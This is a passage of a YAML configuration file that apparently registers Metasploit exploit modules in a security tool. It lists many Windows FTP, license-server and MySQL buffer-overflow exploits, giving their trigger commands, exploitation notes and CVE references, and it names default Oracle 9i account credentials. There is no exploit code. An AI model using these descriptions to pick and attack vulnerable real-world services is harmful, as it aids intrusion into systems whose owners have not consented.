\t\t\t\tdefault Microsoft Windows installations of MySQL (=< 5.5.9), directory write\n\ + \t\t\t\tpermissions not enforced, and the MySQL service runs as LocalSystem.\n\n\ + \t\t\t\tNOTE: This module will leave a payload executable on the target system when the\n\ + \t\t\t\tattack is finished, as well as the UDF DLL, and will define or redefine sys_eval()\n\ + \t\t\t\tand sys_exec() functions.\n\ + \t\t\t" + authors: + - - URL + - http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html + - - URL + - http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html + path: extensions/metasploit/ + class: Msf_module +msf_calicserv_getconfig: + enable: true + msf: true + msf_key: windows/license/calicserv_getconfig + name: Computer Associates License Server GETCONFIG Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an vulnerability in the CA License Server\n\ + \t\t\t\tnetwork service. By sending an excessively long GETCONFIG\n\ + \t\t\t\tpacket the stack may be overwritten.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0581 + - - OSVDB + - "14389" + - - BID + - "12705" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213 + path: extensions/metasploit/ + class: Msf_module +msf_sentinel_lm7_udp: + enable: true + msf: true + msf_key: windows/license/sentinel_lm7_udp + name: SentinelLM UDP Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a simple stack buffer overflow in the Sentinel\n\ + \t\t\t\tLicense Manager. The SentinelLM service is installed with a\n\ + \t\t\t\twide selection of products and seems particular popular with\n\ + \t\t\t\tacademic products. If the wrong target value is selected,\n\ + \t\t\t\tthe service will crash and not restart.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0353 + - - OSVDB + - "14605" + - - BID + - "12742" + path: extensions/metasploit/ + class: Msf_module +msf_calicclnt_getconfig: + enable: true + msf: true + msf_key: windows/license/calicclnt_getconfig + name: Computer Associates License Client GETCONFIG Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an vulnerability in the CA License Client\n\ + \t\t\t\tservice. This exploit will only work if your IP address can be\n\ + \t\t\t\tresolved from the target system point of view. This can be\n\ + \t\t\t\taccomplished on a local network by running the 'nmbd' service\n\ + \t\t\t\tthat comes with Samba. If you are running this exploit from\n\ + \t\t\t\tWindows and do not filter udp port 137, this should not be a\n\ + \t\t\t\tproblem (if the target is on the same network segment). Due to\n\ + \t\t\t\tthe bugginess of the software, you are only allowed one connection\n\ + \t\t\t\tto the agent port before it starts ignoring you. If it wasn't for this\n\ + \t\t\t\tissue, it would be possible to repeatedly exploit this bug.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0581 + - - OSVDB + - "14389" + - - BID + - "12705" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213 + path: extensions/metasploit/ + class: Msf_module +msf_globalscapeftp_input: + enable: true + msf: true + msf_key: windows/ftp/globalscapeftp_input + name: GlobalSCAPE Secure FTP Server Input Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.\n\ + \t\t\t\tAll versions prior to 3.0.3 are affected by this flaw. A valid user account (\n\ + \t\t\t\tor anonymous access) is required for this exploit to work.\n\ + \t\t\t" + authors: + - - CVE + - 2005-1415 + - - OSVDB + - "16049" + - - BID + - "13454" + - - URL + - http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html + path: extensions/metasploit/ + class: Msf_module +msf_32bitftp_list_reply: + enable: true + msf: true + msf_key: windows/ftp/32bitftp_list_reply + name: "32bit FTP Client Stack Buffer Overflow " + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to\n\ + \t\t\t\t\tdownload a file that has an overly long filename.\n\ + \t\t\t" + authors: + - - URL + - http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ + path: extensions/metasploit/ + class: Msf_module +msf_wftpd_size: + enable: true + msf: true + msf_key: windows/ftp/wftpd_size + name: Texas Imperial Software WFTPD 3.23 SIZE Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the SIZE verb in\n\ + \t\t\t\tTexas Imperial's Software WFTPD 3.23.\n\ + \t\t\t" + authors: + - - CVE + - 2006-4318 + - - OSVDB + - "28134" + - - BID + - "19617" + path: extensions/metasploit/ + class: Msf_module +msf_odin_list_reply: + enable: true + msf: true + msf_key: windows/ftp/odin_list_reply + name: Odin Secure FTP 4.1 Stack Buffer Overflow (LIST) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Odin Secure FTP 4.1,\n\ + \t\t\t\ttriggered when processing the response on a LIST command. During the overflow,\n\ + \t\t\t\ta structured exception handler record gets overwritten.\n\ + \t\t\t" + authors: + - - URL + - http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ + path: extensions/metasploit/ + class: Msf_module +msf_dreamftp_format: + enable: true + msf: true + msf_key: windows/ftp/dreamftp_format + name: BolinTech Dream FTP Server 1.02 Format String + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a format string overflow in the BolinTech\n\ + \t\t\t\tDream FTP Server version 1.02. Based on the exploit by SkyLined.\n\ + \t\t\t" + authors: + - - CVE + - 2004-2074 + - - OSVDB + - "4986" + - - BID + - "9800" + - - URL + - http://www.milw0rm.com/exploits/823 + path: extensions/metasploit/ + class: Msf_module +msf_proftp_banner: + enable: true + msf: true + msf_key: windows/ftp/proftp_banner + name: ProFTP 2.9 Banner Remote Buffer Overflow Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the ProFTP 2.9\n\ + \t\t\t\tclient that is triggered through an excessively long welcome message.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3976 + - - OSVDB + - "57394" + - - URL + - http://www.labtam-inc.com/index.php?act=products&pid=1 + path: extensions/metasploit/ + class: Msf_module +msf_filewrangler_list_reply: + enable: true + msf: true + msf_key: windows/ftp/filewrangler_list_reply + name: FileWrangler 5.30 Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the FileWrangler client\n\ + \t\t\t\tthat is triggered when the client connects to a FTP server and lists\n\ + \t\t\t\tthe directory contents, containing an overly long directory name.\n\ + \t\t\t" + authors: + - - URL + - http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ + path: extensions/metasploit/ + class: Msf_module +msf_httpdx_tolog_format: + enable: true + msf: true + msf_key: windows/http/httpdx_tolog_format + name: HTTPDX tolog() Function Format String Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a format string vulnerability in HTTPDX HTTP server.\n\ + \t\t\t\tBy sending an specially crafted HTTP request containing format specifiers, an\n\ + \t\t\t\tattacker can corrupt memory and execute arbitrary code.\n\n\ + \t\t\t\tBy default logging is off for HTTP, but enabled for the 'moderator' user\n\ + \t\t\t\tvia FTP.\n\ + \t\t\t" + authors: + - - CVE + - 2009-4769 + - - OSVDB + - "60182" + path: extensions/metasploit/ + class: Msf_module +msf_oracle9i_xdb_ftp_pass: + enable: true + msf: true + msf_key: windows/ftp/oracle9i_xdb_ftp_pass + name: Oracle 9i XDB FTP PASS Overflow (win32) + category: Metasploit + description: "\n\ + \t\t\t\t\tBy passing an overly long string to the PASS command, a\n\ + \t\t\t\tstack based buffer overflow occurs. David Litchfield, has\n\ + \t\t\t\tillustrated multiple vulnerabilities in the Oracle 9i XML\n\ + \t\t\t\tDatabase (XDB), during a seminar on \"Variations in exploit\n\ + \t\t\t\tmethods between Linux and Windows\" presented at the Blackhat\n\ + \t\t\t\tconference.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0727 + - - OSVDB + - "2449" + - - BID + - "8375" + - - URL + - http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf + path: extensions/metasploit/ + class: Msf_module +msf_slimftpd_list_concat: + enable: true + msf: true + msf_key: windows/ftp/slimftpd_list_concat + name: SlimFTPd LIST Concatenation Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the SlimFTPd\n\ + \t\t\t\tserver. The flaw is triggered when a LIST command is\n\ + \t\t\t\treceived with an overly-long argument. This vulnerability\n\ + \t\t\t\taffects all versions of SlimFTPd prior to 3.16 and was\n\ + \t\t\t\tdiscovered by Raphael Rigo.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2373 + - - OSVDB + - "18172" + - - BID + - "14339" + path: extensions/metasploit/ + class: Msf_module +msf_easyfilesharing_pass: + enable: true + msf: true + msf_key: windows/ftp/easyfilesharing_pass + name: Easy File Sharing FTP Server 2.0 PASS Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in the Easy File Sharing 2.0\n\ + \t\t\t\tservice. By sending an overly long password, an attacker can execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3952 + - - OSVDB + - "27646" + - - BID + - "19243" + path: extensions/metasploit/ + class: Msf_module +msf_xftp_client_pwd: + enable: true + msf: true + msf_key: windows/ftp/xftp_client_pwd + name: Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered\n\ + \t\t\t\tthrough an excessively long PWD message.\n\ + \t\t\t" + authors: + - - OSVDB + - "63968" + - - URL + - http://www.exploit-db.com/exploits/12332 + path: extensions/metasploit/ + class: Msf_module +msf_xlink_client: + enable: true + msf: true + msf_key: windows/ftp/xlink_client + name: Xlink FTP Client Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Xlink FTP Client 32\n\ + \t\t\t\tVersion 3.01 that comes bundled with Omni-NFS Enterprise 5.2.\n\ + \t\t\t\tWhen a overly long FTP server response is recieved by a client,\n\ + \t\t\t\tarbitrary code may be executed.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5792 + - - OSVDB + - "33969" + - - URL + - http://www.metasploit.com/ + - - URL + - http://www.xlink.com + path: extensions/metasploit/ + class: Msf_module +msf_3cdaemon_ftp_user: + enable: true + msf: true + msf_key: windows/ftp/3cdaemon_ftp_user + name: 3Com 3CDaemon 2.0 FTP Username Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the 3Com 3CDaemon\n\ + \t\t\t\tFTP service. This package is being distributed from the 3Com\n\ + \t\t\t\tweb site and is recommended in numerous support documents.\n\ + \t\t\t\tThis module uses the USER command to trigger the overflow.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0277 + - - OSVDB + - "12810" + - - OSVDB + - "12811" + - - BID + - "12155" + - - URL + - ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip + path: extensions/metasploit/ + class: Msf_module +msf_easyftp_list_fixret: + enable: true + msf: true + msf_key: windows/ftp/easyftp_list_fixret + name: EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.\n\ + \t\t\t\tcredit goes to Karn Ganeshan.\n\n\ + \t\t\t\tNOTE: Although, this is likely to exploit the same vulnerability as the\n\ + \t\t\t\t'easyftp_cwd_fixret' exploit, it uses a slightly different vector.\n\ + \t\t\t" + authors: + - - OSVDB + - "62134" + - - URL + - http://www.exploit-db.com/exploits/14400/ + - - URL + - http://www.exploit-db.com/exploits/14451/ + path: extensions/metasploit/ + class: Msf_module +msf_filecopa_list_overflow: + enable: true + msf: true + msf_key: windows/ftp/filecopa_list_overflow + name: FileCopa FTP Server pre 18 Jul Version + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits the buffer overflow found in the LIST command\n\ + \t\t\t\tin fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch\n\ + \t\t\t" + authors: + - - CVE + - 2006-3726 + - - OSVDB + - "27389" + - - BID + - "19065" + path: extensions/metasploit/ + class: Msf_module +msf_ftpsynch_list_reply: + enable: true + msf: true + msf_key: windows/ftp/ftpsynch_list_reply + name: FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro\n\ + \t\t\t\tversion 4.0.73.274 The overflow gets triggered by sending an overly long filename to\n\ + \t\t\t\tthe client in response to a LIST command.\n\ + \t\t\t\tThe LIST command gets issued when doing a preview or when you have just created a new\n\ + \t\t\t\tsync profile and allow the tool to see the differences.\n\ + \t\t\t\tThis will overwrite a structured exception handler and trigger an access violation.\n\ + \t\t\t" + authors: + - - URL + - http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ + path: extensions/metasploit/ + class: Msf_module +msf_ftpshell51_pwd_reply: + enable: true + msf: true + msf_key: windows/ftp/ftpshell51_pwd_reply + name: FTPShell 5.1 Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets\n\ + \t\t\t\ttriggered when the ftp clients tries to process an overly response to a PWD command.\n\ + \t\t\t\tThis will overwrite the saved EIP and structured exception handler.\n\ + \t\t\t" + authors: + - - OSVDB + - "68639" + - - URL + - http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ + path: extensions/metasploit/ + class: Msf_module +msf_easyftp_mkd_fixret: + enable: true + msf: true + msf_key: windows/ftp/easyftp_mkd_fixret + name: EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n\ + \t\t\t\tand earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which\n\ + \t\t\t\tleads to a stack based buffer overflow.\n\n\ + \t\t\t\tNOTE: EasyFTP allows anonymous access by default. However, in order to access the\n\ + \t\t\t\t'MKD' command, you must have access to an account that can create directories.\n\n\ + \t\t\t\tAfter version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n\ + \t\t\t\tThis exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n\ + \t\t\t\tThis code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n\ + \t\t\t\t'fixing' the return address post-exploitation. See references for more information.\n\ + \t\t\t" + authors: + - - OSVDB + - "62134" + - - URL + - http://www.exploit-db.com/exploits/12044/ + - - URL + - http://www.exploit-db.com/exploits/14399/ + path: extensions/metasploit/ + class: Msf_module +msf_ftppad_list_reply: + enable: true + msf: true + msf_key: windows/ftp/ftppad_list_reply + name: FTPPad 1.2.0 Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is\n\ + \t\t\t\ttriggered when the client connects to a FTP server which sends an overly long directory\n\ + \t\t\t\tand filename in response to a LIST command.\n\n\ + \t\t\t\tThis will cause an access violation, and will eventually overwrite the saved extended\n\ + \t\t\t\tinstruction pointer. Payload can be found at EDX+5c and ESI+5c, so a little pivot/\n\ + \t\t\t\tsniper was needed to make this one work.\n\ + \t\t\t" + authors: + - - URL + - http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ + path: extensions/metasploit/ + class: Msf_module +msf_aasync_list_reply: + enable: true + msf: true + msf_key: windows/ftp/aasync_list_reply + name: AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when\n\ + \t\t\t\tprocessing the response on a LIST command. During the overflow, a structured exception\n\ + \t\t\t\thandler record gets overwritten.\n\ + \t\t\t" + authors: + - - URL + - http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ + path: extensions/metasploit/ + class: Msf_module +msf_wsftp_server_505_xmd5: + enable: true + msf: true + msf_key: windows/ftp/wsftp_server_505_xmd5 + name: Ipswitch WS_FTP Server 5.05 XMD5 Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the XMD5 verb in\n\ + \t\t\t\tIPSWITCH WS_FTP Server 5.05.\n\ + \t\t\t" + authors: + - - CVE + - 2006-4847 + - - OSVDB + - "28939" + - - BID + - "20076" + path: extensions/metasploit/ + class: Msf_module +msf_goldenftp_pass_bof: + enable: true + msf: true + msf_key: windows/ftp/goldenftp_pass_bof + name: GoldenFTP PASS Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the Golden FTP service, using the PASS\n\ + \t\t\t\tcommand to cause a buffer overflow. Please note that in order trigger the vulnerable\n\ + \t\t\t\tcode, the victim machine must have the \"Show new connections\" setting enabled. By\n\ + \t\t\t\tdefault, this option is unchecked.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6576 + - - OSVDB + - "35951" + - - BID + - "45957 " + - - URL + - http://www.exploit-db.com/exploits/16036/ + path: extensions/metasploit/ + class: Msf_module +msf_warftpd_165_user: + enable: true + msf: true + msf_key: windows/ftp/warftpd_165_user + name: War-FTPD 1.65 Username Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow found in the USER command\n\ + \t\t\t\tof War-FTPD 1.65.\n\ + \t\t\t" + authors: + - - CVE + - 1999-0256 + - - OSVDB + - "875" + - - BID + - "10078" + - - URL + - http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html + path: extensions/metasploit/ + class: Msf_module +msf_sami_ftpd_user: + enable: true + msf: true + msf_key: windows/ftp/sami_ftpd_user + name: KarjaSoft Sami FTP Server v2.02 USER Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits the KarjaSoft Sami FTP Server version 2.02\n\ + \t\t\t\tby sending an excessively long USER string. The stack is overwritten\n\ + \t\t\t\twhen the administrator attempts to view the FTP logs. Therefore, this exploit\n\ + \t\t\t\tis passive and requires end-user interaction. Keep this in mind when selecting\n\ + \t\t\t\tpayloads. When the server is restarted, it will re-execute the exploit until\n\ + \t\t\t\tthe logfile is manually deleted via the file system.\n\ + \t\t\t" + authors: + - - CVE + - 2006-0441 + - - CVE + - 2006-2212 + - - OSVDB + - "25670" + - - BID + - "16370" + - - BID + - "22045" + - - BID + - "17835" + - - URL + - http://www.milw0rm.com/exploits/1448 + - - URL + - http://www.milw0rm.com/exploits/1452 + - - URL + - http://www.milw0rm.com/exploits/1462 + - - URL + - http://www.milw0rm.com/exploits/3127 + - - URL + - http://www.milw0rm.com/exploits/3140 + path: extensions/metasploit/ + class: Msf_module +msf_oracle9i_xdb_ftp_unlock: + enable: true + msf: true + msf_key: windows/ftp/oracle9i_xdb_ftp_unlock + name: Oracle 9i XDB FTP UNLOCK Overflow (win32) + category: Metasploit + description: "\n\ + \t\t\t\t\tBy passing an overly long token to the UNLOCK command, a\n\ + \t\t\t\tstack based buffer overflow occurs. David Litchfield, has\n\ + \t\t\t\tillustrated multiple vulnerabilities in the Oracle 9i XML\n\ + \t\t\t\tDatabase (XDB), during a seminar on \"Variations in exploit\n\ + \t\t\t\tmethods between Linux and Windows\" presented at the Blackhat\n\ + \t\t\t\tconference. Oracle9i includes a number of default accounts,\n\ + \t\t\t\tincluding dbsnmp:dbsmp, scott:tiger, system:manager, and\n\ + \t\t\t\tsys:change_on_install.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0727 + - - OSVDB + - "2449" + - - BID + - "8375" + - - URL + - http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf + path: extensions/metasploit/ + class: Msf_module +msf_leapftp_list_reply: + enable: true + msf: true + msf_key: windows/ftp/leapftp_list_reply + name: LeapFTP 3.0.1 Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the LeapFTP 3.0.1 client.\n\ + \t\t\t\tThis issue is triggered when a file with a long name is downloaded/opened.\n\ + \t\t\t" + authors: + - - OSVDB + - "68640" + - - URL + - http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ + path: extensions/metasploit/ + class: Msf_module +msf_trellian_client_pasv: + enable: true + msf: true + msf_key: windows/ftp/trellian_client_pasv + name: Trellian FTP Client 3.01 PASV Remote Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered\n\ + \t\t\t\tthrough an excessively long PASV message.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1465 + - - OSVDB + - "63812" + - - URL + - http://www.exploit-db.com/exploits/12152 + path: extensions/metasploit/ + class: Msf_module +msf_vermillion_ftpd_port: + enable: true + msf: true + msf_key: windows/ftp/vermillion_ftpd_port + name: Vermillion FTP Daemon PORT Command Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an out-of-bounds array access in the Arcane Software\n\ + \t\t\t\tVermillion FTP server. By sending an specially crafted FTP PORT command,\n\ + \t\t\t\tan attacker can corrupt stack memory and execute arbitrary code.\n\n\ + \t\t\t\tThis particular issue is caused by processing data bound by attacker\n\ + \t\t\t\tcontrolled input while writing into a 4 byte stack buffer. Unfortunately,\n\ + \t\t\t\tthe writing that occurs is not a simple byte copy.\n\n\ + \t\t\t\tProcessing is done using a source ptr (p) and a destination pointer (q).\n\ + \t\t\t\tThe vulnerable function walks the input string and continues while the\n\ + \t\t\t\tsource byte is non-null. If a comma is encountered, the function increments\n\ + \t\t\t\tthe the destination pointer. If an ascii digit [0-9] is encountered, the\n\ + \t\t\t\tfollowing occurs:\n\n\ + \t\t\t\t\t*q = (*q * 10) + (*p - '0');\n\n\ + \t\t\t\tAll other input characters are ignored in this loop.\n\n\ + \t\t\t\tAs a consequence, an attacker must craft input such that modifications\n\ + \t\t\t\tto the current values on the stack result in usable values. In this exploit,\n\ + \t\t\t\tthe low two bytes of the return address are adjusted to point at the\n\ + \t\t\t\tlocation of a 'call edi' instruction within the binary. This was chosen\n\ + \t\t\t\tsince 'edi' points at the source buffer when the function returns.\n\n\ + \t\t\t\tNOTE: This server can be installed as a service using \"vftpd.exe install\".\n\ + \t\t\t\tIf so, the service does not restart automatically, giving an attacker only\n\ + \t\t\t\tone attempt.\n\ + \t\t\t" + authors: + - - OSVDB + - "62163" + - - URL + - http://www.exploit-db.com/exploits/11293 + - - URL + - http://www.global-evolution.info/news/files/vftpd/vftpd.txt + path: extensions/metasploit/ + class: Msf_module +msf_cesarftp_mkd: + enable: true + msf: true + msf_key: windows/ftp/cesarftp_mkd + name: Cesar FTP 0.99g MKD Command Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.\n\n\ + \t\t\t\tYou must have valid credentials to trigger this vulnerability. Also, you\n\ + \t\t\t\tonly get one chance, so choose your target carefully.\n\ + \t\t\t" + authors: + - - CVE + - 2006-2961 + - - OSVDB + - "26364" + - - BID + - "18586" + - - URL + - http://secunia.com/advisories/20574/ + path: extensions/metasploit/ + class: Msf_module +msf_easyftp_cwd_fixret: + enable: true + msf: true + msf_key: windows/ftp/easyftp_cwd_fixret + name: EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n\ + \t\t\t\tand earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which\n\ + \t\t\t\tleads to a stack based buffer overflow. EasyFTP allows anonymous access by\n\ + \t\t\t\tdefault; valid credentials are typically unnecessary to exploit this vulnerability.\n\n\ + \t\t\t\tAfter version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n\ + \t\t\t\tThis exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n\ + \t\t\t\tThis code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n\ + \t\t\t\t'fixing' the return address post-exploitation. See references for more information.\n\ + \t\t\t" + authors: + - - OSVDB + - "62134" + - - URL + - http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/ + - - URL + - http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit + - - URL + - http://seclists.org/bugtraq/2010/Feb/202 + - - URL + - http://code.google.com/p/easyftpsvr/ + - - URL + - https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip + - - URL + - http://www.securityfocus.com/bid/38262/exploit + path: extensions/metasploit/ + class: Msf_module +msf_wsftp_server_503_mkd: + enable: true + msf: true + msf_key: windows/ftp/wsftp_server_503_mkd + name: WS-FTP Server 5.03 MKD Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits the buffer overflow found in the MKD\n\ + \t\t\t\tcommand in IPSWITCH WS_FTP Server 5.03 discovered by Reed\n\ + \t\t\t\tArvin.\n\ + \t\t\t" + authors: + - - CVE + - 2004-1135 + - - OSVDB + - "12509" + - - BID + - "11772" + path: extensions/metasploit/ + class: Msf_module +msf_ms09_053_ftpd_nlst: + enable: true + msf: true + msf_key: windows/ftp/ms09_053_ftpd_nlst + name: Microsoft IIS FTP Server NLST Response Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow flaw in the Microsoft IIS FTP\n\ + \t\t\t\tservice. The flaw is triggered when a special NLST argument is passed\n\ + \t\t\t\twhile the session has changed into a long directory path. For this exploit\n\ + \t\t\t\tto work, the FTP server must be configured to allow write access to the\n\ + \t\t\t\tfile system (either anonymously or in conjunction with a real account)\n\ + \t\t\t" + authors: + - - URL + - http://milw0rm.com/exploits/9541 + - - CVE + - 2009-3023 + - - OSVDB + - "57589" + - - BID + - "36189" + - - MSB + - MS09-053 + path: extensions/metasploit/ + class: Msf_module +msf_xlink_server: + enable: true + msf: true + msf_key: windows/ftp/xlink_server + name: Xlink FTP Server Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Xlink FTP Server\n\ + \t\t\t\tthat comes bundled with Omni-NFS Enterprise 5.2.\n\ + \t\t\t\tWhen a overly long FTP request is sent to the server,\n\ + \t\t\t\tarbitrary code may be executed.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5792 + - - OSVDB + - "58646" + - - URL + - http://www.metasploit.com/ + - - URL + - http://www.xlink.com + path: extensions/metasploit/ + class: Msf_module +msf_seagull_list_reply: + enable: true + msf: true + msf_key: windows/ftp/seagull_list_reply + name: Seagull FTP v3.3 build 409 Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the Seagull FTP client that gets\n\ + \t\t\t\ttriggered when the ftp clients processes a response to a LIST command. If the\n\ + \t\t\t\tresponse contains an overly long file/folder name, a buffer overflow occurs,\n\ + \t\t\t\toverwriting a structured exception handler.\n\ + \t\t\t" + authors: + - - URL + - http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ + path: extensions/metasploit/ + class: Msf_module +msf_warftpd_165_pass: + enable: true + msf: true + msf_key: windows/ftp/warftpd_165_pass + name: War-FTPD 1.65 Password Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploits the buffer overflow found in the PASS command\n\ + \t\t\t\tin War-FTPD 1.65. This particular module will only work\n\ + \t\t\t\treliably against Windows 2000 targets. The server must be\n\ + \t\t\t\tconfigured to allow anonymous logins for this exploit to\n\ + \t\t\t\tsucceed. A failed attempt will bring down the service\n\ + \t\t\t\tcompletely.\n\ + \t\t\t" + authors: + - - CVE + - 1999-0256 + - - OSVDB + - "875" + - - BID + - "10078" + - - URL + - http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html + path: extensions/metasploit/ + class: Msf_module +msf_sasser_ftpd_port: + enable: true + msf: true + msf_key: windows/ftp/sasser_ftpd_port + name: Sasser Worm avserve FTP PORT Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits the FTP server component of the Sasser worm.\n\ + \t\t\t\tBy sending an overly long PORT command the stack can be overwritten.\n\ + \t\t\t" + authors: + - - OSVDB + - "6197" + path: extensions/metasploit/ + class: Msf_module +msf_leapftp_pasv_reply: + enable: true + msf: true + msf_key: windows/ftp/leapftp_pasv_reply + name: LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600\n\ + \t\t\t\tclient that is triggered through an excessively long PASV reply command. This\n\ + \t\t\t\tmodule was ported from the original exploit by drG4njubas with minor improvements.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0558 + - - OSVDB + - "4587" + - - BID + - "7860" + - - URL + - http://www.milw0rm.com/exploits/54 + path: extensions/metasploit/ + class: Msf_module +msf_gekkomgr_list_reply: + enable: true + msf: true + msf_key: windows/ftp/gekkomgr_list_reply + name: Gekko Manager FTP Client Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Gekko Manager ftp client, triggered when\n\ + \t\t\t\tprocessing the response received after sending a LIST request. If this response contains\n\ + \t\t\t\ta long filename, a buffer overflow occurs, overwriting a structured exception handler.\n\ + \t\t\t" + authors: + - - OSVDB + - "68641" + - - URL + - http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ + path: extensions/metasploit/ + class: Msf_module +msf_ftpgetter_pwd_reply: + enable: true + msf: true + msf_key: windows/ftp/ftpgetter_pwd_reply + name: FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in FTPGetter Standard 